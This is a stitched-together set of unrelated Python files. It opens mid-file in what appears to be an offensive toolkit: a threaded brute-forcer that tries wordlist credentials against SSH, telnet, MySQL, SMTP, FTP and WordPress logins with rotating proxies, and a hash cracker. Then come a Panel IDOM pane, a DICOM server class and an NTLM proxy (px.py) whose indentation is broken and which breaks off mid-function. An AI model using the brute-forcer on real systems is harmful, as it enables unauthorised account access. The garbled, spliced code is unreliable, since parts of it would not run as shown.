            return
        for x in word_list:
            if self.stop==True:
                break
            user=x.split(':')[0].strip()
            pwd=x.split(':')[1].strip()
            if self.logs==True:
                print("[*]Trying ==> {}:{}".format(user,pwd))
            if protocol=="ssh":
                r=s(u,user,pwd,timeout=timeout,p=p,exchange_key=exchange_key)
            elif protocol in ("telnet","mysql"):
                r=s(u,user,pwd,timeout=timeout,p=p)
            elif protocol=="smtp":
                # BUG FIX: the original called s(u,p,user,pwd,...) which
                # mapped p->username, user->password, pwd->port in smtp()'s
                # signature; pass the port by keyword instead.
                r=s(u,user,pwd,p=p,ehlo=ehlo,helo=helo,ttls=ttls)
            elif protocol=="wp":
                prx=proxy
                if proxies:
                    prx=random.choice(proxies)
                # BUG FIX: user_agent/cookie were undefined names here.
                r=s(u,user,pwd,proxy=prx,user_agent=user_agent,cookie=cookie,timeout=timeout)
            else:
                # ftp
                r=s(u,user,pwd,timeout=timeout)
            if r==True:
                if self.logs==True:
                    print("[+]Found!!!")
                o="{}:{}".format(user,pwd)
                break
            else:
                if self.logs==True:
                    print("[-]Failed")
        self.result={u:o}
        self.finish=True
    def done(self):
        """Return True once the worker thread has terminated (added so
        process_threaded() works with hydra like the sibling classes)."""
        return self.finish
class decrypt:
    """Offline hash bruteforcer: tries every candidate in `word_list`
    against the hash `u` for each enabled hash type, on a background
    thread. The first match is stored in self.result as
    {hash: ["<type>:<plaintext>"]}.
    """
    __slots__=["stop","finish","result","logs"]
    def __init__(self,u,word_list=None,threads_daemon=True,md5_hash=False,sha1_hash=False,sha256_hash=False,sha224_hash=False,sha384_hash=False,sha512_hash=False,base64_hash=False,caesar_hash=False,logs=False):
        # word_list default changed from a shared mutable [] to None;
        # observable behavior is identical.
        if word_list is None:
            word_list=[]
        self.logs=logs
        self.stop=False
        self.finish=False
        self.result={}
        t=threading.Thread(target=self.crack,args=(u,word_list,md5_hash,sha1_hash,sha256_hash,sha224_hash,sha384_hash,sha512_hash,base64_hash,caesar_hash,logs,))
        t.daemon=threads_daemon
        t.start()
    def crack(self,u,word_list,md5_hash,sha1_hash,sha256_hash,sha224_hash,sha384_hash,sha512_hash,base64_hash,caesar_hash,logs):
        """Worker thread: set self.result on the first match, then finish."""
        if self.logs==True:
            print('[!]hash: '+u+'\nbruteforcing has started!!!\n')
        for x in word_list:
            if self.stop==True:
                break
            if md5_hash==True:
                if dmd5(x,u)==True:
                    if self.logs==True:
                        print("[+]Hash match found: "+x+" | Type: md5")
                    self.result={u:["md5:"+x]}
                    break
            if sha1_hash==True:
                if dsha1(x,u)==True:
                    if self.logs==True:
                        print("[+]Hash match found: "+x+" | Type: sha1")
                    self.result={u:["sha1:"+x]}
                    break
            if sha256_hash==True:
                if dsha256(x,u)==True:
                    if self.logs==True:
                        print("[+]Hash match found: "+x+" | Type: sha256")
                    self.result={u:["sha256:"+x]}
                    break
            if sha224_hash==True:
                if dsha224(x,u)==True:
                    if self.logs==True:
                        print("[+]Hash match found: "+x+" | Type: sha224")
                    self.result={u:["sha224:"+x]}
                    break
            if sha384_hash==True:
                if dsha384(x,u)==True:
                    if self.logs==True:
                        print("[+]Hash match found: "+x+" | Type: sha384")
                    self.result={u:["sha384:"+x]}
                    break
            if sha512_hash==True:
                if dsha512(x,u)==True:
                    if self.logs==True:
                        print("[+]Hash match found: "+x+" | Type: sha512")
                    self.result={u:["sha512:"+x]}
                    break
            if base64_hash==True:
                if base64decode(x)==u:
                    if self.logs==True:
                        print("[+]Hash match found: "+x+" | Type: base64")
                    self.result={u:["base64:"+x]}
                    break
            if caesar_hash==True:
                # NOTE(review): dcaesar(x, i) never receives `u` — confirm
                # it compares against the target hash internally.
                matched=False
                for i in range(1,27):
                    if dcaesar(x,i)==True:
                        if self.logs==True:
                            print("[+]Hash match found: "+x+" | Type: caesar | Key: "+str(i))
                        self.result={u:["caesar"+str(i)+":"+x]}
                        matched=True
                        break
                if matched:
                    # BUG FIX: the original only broke the inner key loop,
                    # so the outer word loop kept running after a caesar
                    # match (unlike every other hash type).
                    break
        if self.result=={}:
            if self.logs==True:
                print('[-]No match found')
        self.finish=True
    def done(self):
        """Return True once the worker thread has terminated."""
        return self.finish
def process_threaded(a,check_interval=0.1):
    """Block until the background task object `a` reports completion.

    `a` is any of the threaded worker classes above (exposes done(), stop,
    and result and/or counter). Polls done() every `check_interval`
    seconds. On Ctrl-C, sets a.stop so the worker exits and returns
    whatever partial result exists.

    Returns a.result if present, else a.counter, else None.
    """
    def _collect(obj):
        # Prefer .result, fall back to .counter, then None.
        # (Narrowed from the original bare excepts: only a missing
        # attribute is an expected condition here.)
        try:
            return obj.result
        except AttributeError:
            pass
        try:
            return obj.counter
        except AttributeError:
            return None
    while True:
        try:
            if a.done()==True:
                return _collect(a)
            time.sleep(check_interval)
        except KeyboardInterrupt:
            a.stop=True
            return _collect(a)
idom.py | import sys
import asyncio
from functools import partial
from threading import Thread
from queue import Queue as SyncQueue
from ..io.notebook import push_on_root
from ..io.resources import DIST_DIR, LOCAL_DIST
from ..io.state import state
from ..models import IDOM as _BkIDOM
from .base import PaneBase
def _spawn_threaded_event_loop(coro):
    """Run `coro` on a fresh asyncio event loop in a daemon thread.

    Blocks only until the worker thread has created and handed back the
    loop; the coroutine itself keeps running in the background.
    """
    handoff = SyncQueue()
    def _worker():
        new_loop = asyncio.new_event_loop()
        asyncio.set_event_loop(new_loop)
        # Publish the loop before entering it so the caller can return.
        handoff.put(new_loop)
        new_loop.run_until_complete(coro)
    Thread(target=_worker, daemon=True).start()
    return handoff.get()
class IDOM(PaneBase):
    """Panel pane that renders an `idom` Component/Layout via a Bokeh
    IDOM model, driving the idom render loop on a background thread."""
    # Explicit-opt-in pane: applies() returns a priority itself.
    priority = None
    _updates = True
    _unpack = True
    _bokeh_model = _BkIDOM
    def __init__(self, object=None, **params):
        super().__init__(object, **params)
        # Created lazily by _setup(); None means "no render loop yet".
        self._idom_loop = None
        # Cached VDOM state, patched incrementally by layout updates.
        self._idom_model = {}
        self.param.watch(self._update_layout, 'object')
    def _update_layout(self, *args):
        """Reset the cached VDOM model; rebuild only if a loop exists."""
        self._idom_model = {}
        if self._idom_loop is None:
            return
        self._setup()
    def _setup(self):
        """Wrap self.object into an idom Layout and start the render loop."""
        if self.object is None:
            return
        from idom.core.component import Component
        from idom.core.layout import Layout
        if isinstance(self.object, Layout):
            self._idom_layout = self.object
        elif isinstance(self.object, Component):
            self._idom_layout = Layout(self.object)
        else:
            # Assumes a zero-arg callable returning a component.
            self._idom_layout = Layout(self.object())
        self._idom_loop = _spawn_threaded_event_loop(self._idom_layout_render_loop())
    def _get_model(self, doc, root=None, parent=None, comm=None):
        """Create the Bokeh model for this pane (panel PaneBase hook)."""
        from idom.core.layout import LayoutUpdate
        # comm present => notebook; serve modules from the dist bundle.
        if comm:
            url = '/panel_dist/idom/build/web_modules'
        else:
            url = '/'+LOCAL_DIST+'idom/build/web_modules'
        if self._idom_loop is None:
            self._setup()
        update = LayoutUpdate.create_from({}, self._idom_model)
        props = self._init_params()
        model = self._bokeh_model(
            event=[update.path, update.changes], importSourceUrl=url, **props
        )
        if root is None:
            root = model
        self._link_props(model, ['msg'], doc, root, comm)
        # NOTE(review): this second root-default check is unreachable —
        # root was already defaulted above.
        if root is None:
            root = model
        self._models[root.ref['id']] = (model, parent)
        return model
    def _cleanup(self, root):
        super()._cleanup(root)
        if not self._models:
            # Clean up loop when no views are shown
            try:
                self._idom_loop.stop()
            finally:
                self._idom_loop = None
                self._idom_layout = None
    def _process_property_change(self, msg):
        """Forward frontend events ('msg') into the idom layout."""
        if msg['msg'] is None:
            return {}
        from idom.core.layout import LayoutEvent
        dispatch = self._idom_layout.dispatch(LayoutEvent(**msg['msg']))
        # Dispatch on the idom loop thread, not the server thread.
        asyncio.run_coroutine_threadsafe(dispatch, loop=self._idom_loop)
        # Clear the msg property on every view so the same event is not
        # re-processed.
        for ref, (m, _) in self._models.items():
            m.msg = None
            push_on_root(ref)
        return {}
    async def _idom_layout_render_loop(self):
        """Background coroutine: apply each idom render update to every view."""
        async with self._idom_layout:
            while True:
                update = await self._idom_layout.render()
                self._idom_model = update.apply_to(self._idom_model)
                for ref, (model, _) in self._models.items():
                    doc = state._views[ref][2]
                    if doc.session_context:
                        # Server context: schedule on the document's loop.
                        doc.add_next_tick_callback(partial(model.update, event=update))
                    else:
                        model.event = update
                        push_on_root(ref)
    @classmethod
    def applies(self, object):
        # NOTE(review): first parameter is named `self` on a classmethod —
        # kept as-is for byte-compatibility.
        from idom.core.component import Component
        from idom.core.layout import Layout
        if 'idom' in sys.modules:
            if isinstance(object, (Component, Layout)):
                return 0.8
            elif callable(object):
                # Callables are ambiguous; don't claim them.
                return None
        return False
    @classmethod
    def install(cls, packages, ignore_installed=False, fallback=None):
        """
        Installs specified packages into application directory.
        Arguments
        ---------
        packages: list or tuple
            The packages to install from npm
        ignored_installed: boolean
            Whether to ignore if the package was previously installed.
        fallback: str or idom.component
            The fallback to display while the component is loading
        """
        import idom
        import idom.client.manage
        # Point idom's client build at panel's dist directory.
        idom.client.manage.APP_DIR = DIST_DIR / 'idom'
        idom.client.manage.BUILD_DIR = DIST_DIR / 'idom' / 'build'
        idom.client.manage.WEB_MODULES_DIR = DIST_DIR / 'idom' / 'build' / 'web_modules'
        return idom.install(packages, ignore_installed, fallback)
    @classmethod
    def use_param(cls, parameter):
        """
        Links parameter to some IDOM state value and returns the linked
        value.
        Arguments
        ---------
        parameter: param.Parameter
            The parameter to link to a idom state value.
        Returns
        -------
        An idom state value which is updated when the parameter changes.
        """
        import idom
        from ..depends import param_value_if_widget
        parameter = param_value_if_widget(parameter)
        initial = getattr(parameter.owner, parameter.name)
        value, set_value = idom.hooks.use_state(initial)
        def update(event):
            set_value(event.new)
        parameter.owner.param.watch(update, parameter.name)
        return value
|
server.py | # -*- coding: utf-8 -*-
import logging
import logging.config
import time
import threading
from pynetdicom2 import uids
from . import ae
from . import config
from . import event_bus
class Server:
    """Server class itself.
    Sets up event bus. Initializes all components and passes config to them.
    :ivar config: server config
    :ivar bus: event bus
    :ivar ae: AE instance
    :ivar components: all available components
    """
    def __init__(self, _config: "config.Config"):
        """Initializes server
        :param _config: server configuration
        :type _config: config.Config
        """
        self.config = _config
        logging.config.dictConfig(self.config.log)
        self.bus = event_bus.EventBus()
        self.ae = None
        self.components = list(self.initalize_components())
    def start(self):
        """Starts the server.
        Broadcasts `ON_START` and `ON_STARTED` events.
        """
        self.bus.broadcast(event_bus.DefaultChannels.ON_START)
        self.ae = ae.AE(self.bus, self.config.ae)
        threading.Thread(target=self.ae.serve_forever).start()
        # TODO: Wait for actual AE to start
        self.bus.broadcast(event_bus.DefaultChannels.ON_STARTED)
    def start_with_block(self):
        """Starts the server and blocks current thread."""
        self.start()
        try:
            while True:
                time.sleep(0.1)
        except KeyboardInterrupt:
            logging.info('Server exiting due to keyboard interupt')
        except SystemExit:
            logging.info('Server exiting due to SystemExit')
        finally:
            self.exit()
    def exit(self):
        """Handles server exit.
        Broadcasts `ON_EXIT` event.
        """
        self.bus.broadcast_nothrow(event_bus.DefaultChannels.ON_EXIT)
        self.ae.quit()
    def initalize_components(self):
        """Component initialization (method name kept for compatibility).
        :yield: initialized components
        :rtype: component.Component
        """
        for component, _config in self.config.components.items():
            if not _config.get('on', False):
                # Component is disabled
                continue
            factory = config.COMPONENT_REGISTRY.get(component)
            if factory is None:
                # BUG FIX: the original fell through and called None(...),
                # crashing startup on any unknown component; skip it with
                # a warning instead.
                # TODO: add dynamic component loading
                logging.warning('No factory registered for component %r; skipping', component)
                continue
            yield factory(self.bus, _config)
|
px.py | "Px is an HTTP proxy server to automatically authenticate through an NTLM proxy"
from __future__ import print_function
__version__ = "0.4.0"
import base64
import ctypes
import ctypes.wintypes
import multiprocessing
import os
import select
import signal
import socket
import sys
import threading
import time
import traceback
# Print if possible
def pprint(*objs):
    """print() that never raises (stdout may be closed or invalid when
    running frozen/with pythonw.exe)."""
    try:
        print(*objs)
    except:
        pass
# Dependencies
try:
import concurrent.futures
except ImportError:
pprint("Requires module futures")
sys.exit()
try:
import netaddr
except ImportError:
pprint("Requires module netaddr")
sys.exit()
try:
import psutil
except ImportError:
pprint("Requires module psutil")
sys.exit()
try:
import pywintypes
import sspi
except ImportError:
pprint("Requires module pywin32")
sys.exit()
try:
import winkerberos
except ImportError:
pprint("Requires module winkerberos")
sys.exit()
try:
import ntlm_auth.ntlm
except ImportError:
pprint("Requires module ntlm-auth")
sys.exit()
try:
import keyring
import keyring.backends.Windows
keyring.set_keyring(keyring.backends.Windows.WinVaultKeyring())
except ImportError:
pprint("Requires module keyring")
sys.exit()
# Python 2.x vs 3.x support
try:
import configparser
import http.server as httpserver
import socketserver
import urllib.parse as urlparse
import winreg
except ImportError:
import ConfigParser as configparser
import SimpleHTTPServer as httpserver
import SocketServer as socketserver
import urlparse
import _winreg as winreg
os.getppid = psutil.Process().ppid
PermissionError = WindowsError
HELP = """Px v%s
An HTTP proxy server to automatically authenticate through an NTLM proxy
Usage:
px [FLAGS]
python px.py [FLAGS]
Actions:
--save
Save configuration to px.ini or file specified with --config
Allows setting up Px config directly from command line
Values specified on CLI override any values in existing config file
Values not specified on CLI or config file are set to defaults
--install
Add Px to the Windows registry to run on startup
--uninstall
Remove Px from the Windows registry
--quit
Quit a running instance of Px.exe
Configuration:
--config=
Specify config file. Valid file path, default: px.ini in working directory
--proxy= --server= proxy:server= in INI file
NTLM server(s) to connect through. IP:port, hostname:port
Multiple proxies can be specified comma separated. Px will iterate through
and use the one that works. Required field unless --noproxy is defined. If
remote server is not in noproxy list and proxy is undefined, Px will reject
the request
--listen= proxy:listen=
IP interface to listen on. Valid IP address, default: 127.0.0.1
--port= proxy:port=
Port to run this proxy. Valid port number, default: 3128
--gateway proxy:gateway=
Allow remote machines to use proxy. 0 or 1, default: 0
Overrides 'listen' and binds to all interfaces
--hostonly proxy:hostonly=
Allow only local interfaces to use proxy. 0 or 1, default: 0
Px allows all IP addresses assigned to local interfaces to use the service.
This allows local apps as well as VM or container apps to use Px when in a
NAT config. Px does this by listening on all interfaces and overriding the
allow list.
--allow= proxy:allow=
Allow connection from specific subnets. Comma separated, default: *.*.*.*
Whitelist which IPs can use the proxy. --hostonly overrides any definitions
unless --gateway mode is also specified
127.0.0.1 - specific ip
192.168.0.* - wildcards
192.168.0.1-192.168.0.255 - ranges
192.168.0.1/24 - CIDR
--noproxy= proxy:noproxy=
Direct connect to specific subnets like a regular proxy. Comma separated
Skip the NTLM proxy for connections to these subnets
127.0.0.1 - specific ip
192.168.0.* - wildcards
192.168.0.1-192.168.0.255 - ranges
192.168.0.1/24 - CIDR
--useragent= proxy:useragent=
Override or send User-Agent header on client's behalf
--username= proxy:username=
Authentication to use when SSPI is unavailable. Format is domain\\username
Service name "Px" and this username are used to retrieve the password using
Python keyring. Px only retrieves credentials and storage should be done
directly in the keyring backend.
On Windows, Credential Manager is the backed and can be accessed from
Control Panel > User Accounts > Credential Manager > Windows Credentials.
Create a generic credential with Px as the network address, this username
and corresponding password.
--workers= settings:workers=
Number of parallel workers (processes). Valid integer, default: 2
--threads= settings:threads=
Number of parallel threads per worker (process). Valid integer, default: 5
--idle= settings:idle=
Idle timeout in seconds for HTTP connect sessions. Valid integer, default: 30
--socktimeout= settings:socktimeout=
Timeout in seconds for connections before giving up. Valid float, default: 20
--proxyreload= settings:proxyreload=
Time interval in seconds before refreshing proxy info. Valid int, default: 60
Proxy info reloaded from a PAC file found via WPAD or AutoConfig URL, or
manual proxy info defined in Internet Options
--foreground settings:foreground=
Run in foreground when frozen or with pythonw.exe. 0 or 1, default: 0
Px will attach to the console and write to it even though the prompt is
available for further commands. CTRL-C in the console will exit Px
--debug settings:log=
Enable debug logging. default: 0
Logs are written to working directory and over-written on startup
A log is automatically created if Px crashes for some reason
--uniqlog
Generate unique log file names
Prevents logs from being overwritten on subsequent runs. Also useful if
running multiple instances of Px""" % __version__
# Windows version (major.minor as a float, e.g. 6.1)
# 6.1 = Windows 7
# 6.2 = Windows 8
# 6.3 = Windows 8.1
# 10.0 = Windows 10
WIN_VERSION = float(str(sys.getwindowsversion().major) + "." + str(sys.getwindowsversion().minor))
# Proxy modes - source of proxy info
MODE_NONE = 0      # no proxy configured
MODE_CONFIG = 1    # from px.ini / CLI
MODE_AUTO = 2      # WPAD auto-detection
MODE_PAC = 3       # PAC file / AutoConfig URL
MODE_MANUAL = 4    # manual proxy from Internet Options
class State(object):
    """Per-process global state shared by all proxy threads.

    Every worker process gets its own copy; only threads within a process
    share it, so the two locks below are thread locks, not process locks.
    """
    allow = netaddr.IPGlob("*.*.*.*")   # subnets allowed to use the proxy
    config = None                       # parsed configparser instance
    domain = ""                         # NTLM domain part of the username
    exit = False                        # set to shut the worker down
    hostonly = False                    # restrict to local interfaces only
    logger = None                       # Log instance when --debug is on
    noproxy = netaddr.IPSet([])         # subnets to connect to directly
    noproxy_hosts = []                  # hostnames to connect to directly
    pac = ""                            # PAC URL when in MODE_PAC
    proxy_mode = MODE_NONE              # one of the MODE_* constants
    proxy_refresh = None                # last proxy-info refresh timestamp
    proxy_server = []                   # list of (host, port) NTLM proxies
    proxy_type = {}                     # per-proxy auth type cache
    stdout = None                       # saved stdout during console reattach
    useragent = ""                      # User-Agent override, if any
    username = ""                       # keyring username for auth
    ini = "px.ini"                      # config file name
    max_disconnect = 3                  # tolerated client socket errors
    max_line = 65536 + 1                # max header line length
    # Locks for thread synchronization;
    # multiprocess sync isn't neccessary because State object is only shared by
    # threads but every process has it's own State object
    proxy_type_lock = threading.Lock()
    proxy_mode_lock = threading.Lock()
class Response(object):
    """Lightweight holder describing an upstream HTTP response."""
    __slots__ = ["code", "length", "headers", "data", "body", "chunked", "close"]
    def __init__(self, code=503):
        # 503 is the default so an unreachable upstream reads as
        # "service unavailable" without extra bookkeeping.
        self.code = code
        self.length = 0
        self.headers = []
        self.data = None
        # Body-handling flags: has a body / chunked transfer / close conn.
        self.body = self.chunked = self.close = False
class Log(object):
    """File-backed tee for stdout/stderr.

    On construction, redirects both sys.stdout and sys.stderr through this
    object so everything printed lands in the log file and (when present)
    the original stdout.
    """
    def __init__(self, name, mode):
        self.file = open(name, mode)
        # Keep the originals so close() can restore them.
        self.stdout = sys.stdout
        self.stderr = sys.stderr
        sys.stdout = self
        sys.stderr = self
    def close(self):
        """Restore the original streams, then close the log file."""
        sys.stdout = self.stdout
        sys.stderr = self.stderr
        self.file.close()
    def write(self, data):
        try:
            self.file.write(data)
        except:
            # Best-effort: never let logging break the caller.
            pass
        if self.stdout is not None:
            self.stdout.write(data)
        self.flush()
    def flush(self):
        self.file.flush()
        # fsync on every write: crash logs must survive a hard exit.
        os.fsync(self.file.fileno())
        if self.stdout is not None:
            self.stdout.flush()
def dprint(msg):
    """Debug-print `msg` prefixed with process, thread, timestamp and the
    calling function's name. No-op unless debug logging is enabled
    (State.logger set)."""
    if State.logger is None:
        return
    caller = sys._getframe(1).f_code.co_name
    prefix = "%s: %s: %d: %s: " % (
        multiprocessing.current_process().name,
        threading.current_thread().name,
        int(time.time()),
        caller,
    )
    # Single write keeps lines from different threads from interleaving.
    sys.stdout.write(prefix + msg + "\n")
def dfile():
    """Return the debug log path for this process, next to the script.

    Name is derived from the process name; '--quit' runs log to a fixed
    name, '--uniqlog' appends a timestamp so runs don't overwrite.
    """
    name = multiprocessing.current_process().name
    if "--quit" in sys.argv:
        name = "quit"
    if "--uniqlog" in sys.argv:
        name = "%s-%f" % (name, time.time())
    return os.path.join(os.path.dirname(get_script_path()), "debug-%s.log" % name)
def reopen_stdout():
    """Attach stdout to the Windows console (CONOUT$) so output is visible
    when running frozen or under pythonw.exe; the previous stream is saved
    in State.stdout for restore_stdout()."""
    # Blank out the current prompt line before writing.
    clrstr = "\r" + " " * 80 + "\r"
    if State.logger is None:
        State.stdout = sys.stdout
        sys.stdout = open("CONOUT$", "w")
        sys.stdout.write(clrstr)
    else:
        # Debug logging active: swap the Log object's tee target instead.
        State.stdout = State.logger.stdout
        State.logger.stdout = open("CONOUT$", "w")
        State.logger.stdout.write(clrstr)
def restore_stdout():
    """Undo reopen_stdout(): close the console handle and restore the
    stream saved in State.stdout."""
    if State.logger is None:
        sys.stdout.close()
        sys.stdout = State.stdout
    else:
        State.logger.stdout.close()
        State.logger.stdout = State.stdout
###
# NTLM support
def b64decode(val):
    """Base64-decode the string `val`, returning bytes.

    Python 2/3 shim: decodebytes (py3) with a decodestring fallback (py2).
    The AttributeError path is load-bearing — do not simplify.
    """
    try:
        return base64.decodebytes(val.encode("utf-8"))
    except AttributeError:
        return base64.decodestring(val)
def b64encode(val):
    """Base64-encode the string `val`, returning bytes (trailing newline
    included, as encodebytes produces).

    Python 2/3 shim: encodebytes (py3) with an encodestring fallback (py2).
    """
    try:
        return base64.encodebytes(val.encode("utf-8"))
    except AttributeError:
        return base64.encodestring(val)
class NtlmMessageGenerator:
    """Produces proxy-auth response tokens via one of three backends:
    pywin32 SSPI (NTLM as the logged-in user), ntlm-auth (NTLM with
    keyring-stored credentials) or winkerberos (Kerberos/Negotiate).
    The chosen backend is bound to self.get_response."""
    # use proxy server as parameter to use the one to which connecting was successful (doesn't need to be the first of the list)
    def __init__(self, proxy_type, proxy_server_address):
        pwd = ""
        if State.username:
            # Credentials come only from the OS keyring; never stored here.
            pwd = keyring.get_password("Px", State.domain + "\\" + State.username)
        if proxy_type == "NTLM":
            if not pwd:
                # No stored password: authenticate as the current user via SSPI.
                self.ctx = sspi.ClientAuth("NTLM", os.environ.get("USERNAME"), scflags=0)
                self.get_response = self.get_response_sspi
            else:
                self.ctx = ntlm_auth.ntlm.NtlmContext(State.username, pwd, State.domain, "", ntlm_compatibility=3)
                self.get_response = self.get_response_ntlm
        else:
            principal = None
            if pwd:
                if State.domain:
                    principal = (urlparse.quote(State.username) + "@" +
                        urlparse.quote(State.domain) + ":" + urlparse.quote(pwd))
                else:
                    principal = urlparse.quote(State.username) + ":" + urlparse.quote(pwd)
            _, self.ctx = winkerberos.authGSSClientInit("HTTP@" + proxy_server_address,
                principal=principal, gssflags=0, mech_oid=winkerberos.GSS_MECH_OID_SPNEGO)
            self.get_response = self.get_response_wkb
    def get_response_sspi(self, challenge=None):
        """One SSPI auth leg. `challenge` is the base64 token from the
        Proxy-Authenticate header (None on the first leg). Returns the
        base64 response token, or None on failure."""
        dprint("pywin32 SSPI")
        if challenge:
            challenge = b64decode(challenge)
        output_buffer = None
        try:
            error_msg, output_buffer = self.ctx.authorize(challenge)
        except pywintypes.error:
            traceback.print_exc(file=sys.stdout)
            return None
        response_msg = b64encode(output_buffer[0].Buffer)
        # Strip the newline encodebytes appends ('\012' == '\n').
        response_msg = response_msg.decode("utf-8").replace('\012', '')
        return response_msg
    def get_response_wkb(self, challenge=""):
        """One Kerberos/Negotiate auth leg via winkerberos. Returns the
        response token, or None on failure."""
        dprint("winkerberos SSPI")
        try:
            winkerberos.authGSSClientStep(self.ctx, challenge)
            auth_req = winkerberos.authGSSClientResponse(self.ctx)
        except winkerberos.GSSError:
            traceback.print_exc(file=sys.stdout)
            return None
        return auth_req
    def get_response_ntlm(self, challenge=""):
        """One NTLM auth leg via ntlm-auth (stored credentials)."""
        dprint("ntlm-auth")
        if challenge:
            challenge = b64decode(challenge)
        response_msg = b64encode(self.ctx.step(challenge))
        response_msg = response_msg.decode("utf-8").replace('\012', '')
        return response_msg
###
# Proxy handler
class Proxy(httpserver.SimpleHTTPRequestHandler):
protocol_version = "HTTP/1.1"
# Contains the proxy servers responsible for the url this Proxy instance (aka thread) serves
proxy_servers = []
proxy_socket = None
def handle_one_request(self):
    """Serve one request, tolerating transient client socket errors.

    Allows up to State.max_disconnect socket errors from the same client
    before forcing the connection closed, to avoid a tight error loop.
    """
    try:
        httpserver.SimpleHTTPRequestHandler.handle_one_request(self)
    except socket.error as e:
        dprint("Socket error: %s" % e)
        if not hasattr(self, "_host_disconnected"):
            self._host_disconnected = 1
            dprint("Host disconnected")
        elif self._host_disconnected < State.max_disconnect:
            self._host_disconnected += 1
            dprint("Host disconnected: %d" % self._host_disconnected)
        else:
            dprint("Closed connection to avoid infinite loop")
            self.close_connection = True
def address_string(self):
    """Client address for log lines.

    Returns the raw IP; reverse DNS (socket.getfqdn) is deliberately
    skipped to keep request handling fast.
    """
    return self.client_address[0]
def log_message(self, format, *args):
    # Route BaseHTTPRequestHandler logging through the debug printer.
    dprint(format % args)
def do_socket_connect(self, destination=None):
    """Ensure self.proxy_socket is connected.

    destination: explicit (host, port) to connect to; when None, tries
    each server in self.proxy_servers in order, rotating unreachable
    ones to the end of the list.
    Returns True when a connection exists, False otherwise.
    """
    # Already connected?
    if self.proxy_socket is not None:
        return True
    dests = list(self.proxy_servers) if destination is None else [destination]
    for dest in dests:
        dprint("New connection: " + str(dest))
        proxy_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            proxy_socket.connect(dest)
            self.proxy_address = dest
            self.proxy_socket = proxy_socket
            break
        except Exception as e:
            dprint("Connect failed: %s" % e)
            # BUG FIX: close the failed socket instead of leaking its fd
            # on every unreachable proxy attempt.
            try:
                proxy_socket.close()
            except socket.error:
                pass
            # move a non reachable proxy to the end of the proxy list;
            if len(self.proxy_servers) > 1:
                # append first and then remove, this should ensure thread safety with
                # manual configurated proxies (in this case self.proxy_servers references the
                # shared State.proxy_server)
                self.proxy_servers.append(dest)
                self.proxy_servers.remove(dest)
    return self.proxy_socket is not None
def do_socket(self, xheaders={}, destination=None):
dprint("Entering")
# Connect to proxy or destination
if not self.do_socket_connect(destination):
return Response(408)
# No chit chat on SSL
if destination is not None and self.command == "CONNECT":
return Response(200)
cl = 0
chk = False
expect = False
keepalive = False
ua = False
cmdstr = "%s %s %s\r\n" % (self.command, self.path, self.request_version)
self.proxy_socket.sendall(cmdstr.encode("utf-8"))
dprint(cmdstr.strip())
for header in self.headers:
hlower = header.lower()
if hlower == "user-agent" and State.useragent != "":
ua = True
h = "%s: %s\r\n" % (header, State.useragent)
else:
h = "%s: %s\r\n" % (header, self.headers[header])
self.proxy_socket.sendall(h.encode("utf-8"))
dprint("Sending %s" % h.strip())
if hlower == "content-length":
cl = int(self.headers[header])
elif hlower == "expect" and self.headers[header].lower() == "100-continue":
expect = True
elif hlower == "proxy-connection":
keepalive = True
elif hlower == "transfer-encoding" and self.headers[header].lower() == "chunked":
dprint("CHUNKED data")
chk = True
if not keepalive and self.request_version.lower() == "http/1.0":
xheaders["Proxy-Connection"] = "keep-alive"
if not ua and State.useragent != "":
xheaders["User-Agent"] = State.useragent
for header in xheaders:
h = ("%s: %s\r\n" % (header, xheaders[header])).encode("utf-8")
self.proxy_socket.sendall(h)
if header.lower() != "proxy-authorization":
dprint("Sending extra %s" % h.strip())
else:
dprint("Sending extra %s: sanitized len(%d)" % (header, len(xheaders[header])))
self.proxy_socket.sendall(b"\r\n")
if self.command in ["POST", "PUT", "PATCH"]:
if not hasattr(self, "body"):
dprint("Getting body for POST/PUT/PATCH")
if cl:
self.body = self.rfile.read(cl)
else:
self.body = self.rfile.read()
dprint("Sending body for POST/PUT/PATCH: %d = %d" % (cl or -1, len(self.body)))
self.proxy_socket.sendall(self.body)
self.proxy_fp = self.proxy_socket.makefile("rb")
resp = Response()
if self.command != "HEAD":
resp.body = True
# Response code
for i in range(2):
dprint("Reading response code")
line = self.proxy_fp.readline(State.max_line)
if line == b"\r\n":
line = self.proxy_fp.readline(State.max_line)
try:
resp.code = int(line.split()[1])
except (ValueError, IndexError):
dprint("Bad response %s" % line)
if line == b"":
dprint("Client closed connection")
return Response(444)
if (b"connection established" in line.lower() or
resp.code == 204 or resp.code == 304):
resp.body = False
dprint("Response code: %d " % resp.code + str(resp.body))
# Get response again if 100-Continue
if not (expect and resp.code == 100):
break
# Headers
dprint("Reading response headers")
while not State.exit:
line = self.proxy_fp.readline(State.max_line).decode("utf-8")
if line == b"":
if self.proxy_socket:
self.proxy_socket.close()
self.proxy_socket = None
dprint("Proxy closed connection: %s" % resp.code)
return Response(444)
if line == "\r\n":
break
nv = line.split(":", 1)
if len(nv) != 2:
dprint("Bad header =>%s<=" % line)
continue
name = nv[0].strip()
value = nv[1].strip()
resp.headers.append((name, value))
if name.lower() != "proxy-authenticate":
dprint("Received %s: %s" % (name, value))
else:
dprint("Received %s: sanitized (%d)" % (name, len(value)))
if name.lower() == "content-length":
resp.length = int(value)
if not resp.length:
resp.body = False
elif name.lower() == "transfer-encoding" and value.lower() == "chunked":
resp.chunked = True
resp.body = True
elif name.lower() in ["proxy-connection", "connection"] and value.lower() == "close":
resp.close = True
return resp
def do_proxy_type(self):
# Connect to proxy
if not hasattr(self, "proxy_address"):
if not self.do_socket_connect():
return Response(408), None
State.proxy_type_lock.acquire()
try:
# Read State.proxy_type only once and use value for function return if it is not None;
# State.proxy_type should only be read here to avoid getting None after successfully
# identifying the proxy type if another thread clears it with load_proxy
proxy_type = State.proxy_type.get(self.proxy_address)
if proxy_type is None:
# New proxy, don't know type yet
dprint("Searching proxy type")
resp = self.do_socket()
proxy_auth = ""
for header in resp.headers:
if header[0] == "Proxy-Authenticate":
proxy_auth += header[1] + " "
if "NTLM" in proxy_auth.upper():
proxy_type = "NTLM"
elif "KERBEROS" in proxy_auth.upper():
proxy_type = "KERBEROS"
elif "NEGOTIATE" in proxy_auth.upper():
proxy_type = "NEGOTIATE"
if proxy_type is not None:
# Writing State.proxy_type only once but use local variable as return value to avoid
# losing the query result (for the current request) by clearing State.proxy_type in load_proxy
State.proxy_type[self.proxy_address] = proxy_type
dprint("Auth mechanisms: " + proxy_auth)
dprint("Selected: " + str(self.proxy_address) + ": " + str(proxy_type))
return resp, proxy_type
return Response(407), proxy_type
finally:
